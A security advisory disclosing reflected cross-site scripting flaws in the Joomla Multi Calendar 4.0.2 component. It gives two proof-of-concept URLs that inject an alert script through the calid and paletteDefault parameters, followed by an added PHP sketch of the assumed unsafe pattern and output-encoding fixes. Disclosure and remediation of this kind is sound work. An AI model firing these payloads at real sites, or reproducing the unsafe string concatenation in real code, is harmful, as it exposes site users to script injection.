Joomla Multi Calendar 4.0.2 Cross Site Scripting

2014.03.16
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Hello,

Multiple cross-site scripting (XSS) vulnerabilities in Multi calendar 4.0.2 component for Joomla! allow remote attackers to inject arbitrary web script or HTML code via (1) the calid parameter to index.php or (2) the paletteDefault parameter to index.php.

File: /tmpl/layout_editevent.php
Lines: 161 and 481
POC: http://site/index.php?option=com_multicalendar&task=editevent&calid=1";</script><script>alert('XSS');</script>

File: /tmpl/layout_editevent.php
Line: 319
POC: http://site/index.php?option=com_multicalendar&task=editevent&paletteDefault=1"</script><script>alert('XSS');</script>

Discovered by Mahmoud Ghorbanzadeh, in Amirkabir University of Technology's Scientific Excellence and Research Centers.

Best Regards.
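Added example, not code from the component or from the advisory's author: the shape of both PoC payloads (a double quote followed by a closing script tag) suggests the parameters are written into a double-quoted JavaScript string inside a script block. The advisory does not quote layout_editevent.php, so the function names and the variable layout below are assumptions; the sketch shows that pattern beside two output-encoding fixes.

```php
<?php
// Hypothetical stand-ins for the template code; the real contents of
// layout_editevent.php are not shown in the advisory.

// BEFORE (assumed pattern): request value concatenated straight into a
// JavaScript string literal inside a <script> element.
function render_unsafe(string $calid): string
{
    return '<script>var calid = "' . $calid . '";</script>';
}

// AFTER, numeric parameter: calid is assumed to be an integer calendar id,
// so cast it and emit a bare number instead of a quoted string.
function render_calid(string $calid): string
{
    return '<script>var calid = ' . (int) $calid . ';</script>';
}

// AFTER, string parameter: json_encode() produces a quoted JS literal.
// The JSON_HEX_* flags turn <, >, &, ' and " into \uXXXX escapes, so the
// value can neither end the string nor close the enclosing <script>.
// JSON_INVALID_UTF8_SUBSTITUTE keeps malformed input from yielding false.
function render_palette(string $palette): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
           | JSON_INVALID_UTF8_SUBSTITUTE;
    return '<script>var paletteDefault = '
         . json_encode($palette, $flags) . ';</script>';
}

// Value of the calid parameter from the advisory's first PoC URL.
$payload = '1";</script><script>alert(\'XSS\');</script>';

// Print all three renderings so the difference is visible in the markup:
// the first contains a second <script> element, the other two do not.
echo render_unsafe($payload), PHP_EOL;
echo render_calid($payload), PHP_EOL;
echo render_palette($payload), PHP_EOL;
```

HTML-entity encoding alone (htmlspecialchars) is the wrong tool for this context, since the browser does not decode entities inside a script element; the encoder has to match the JavaScript string context.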

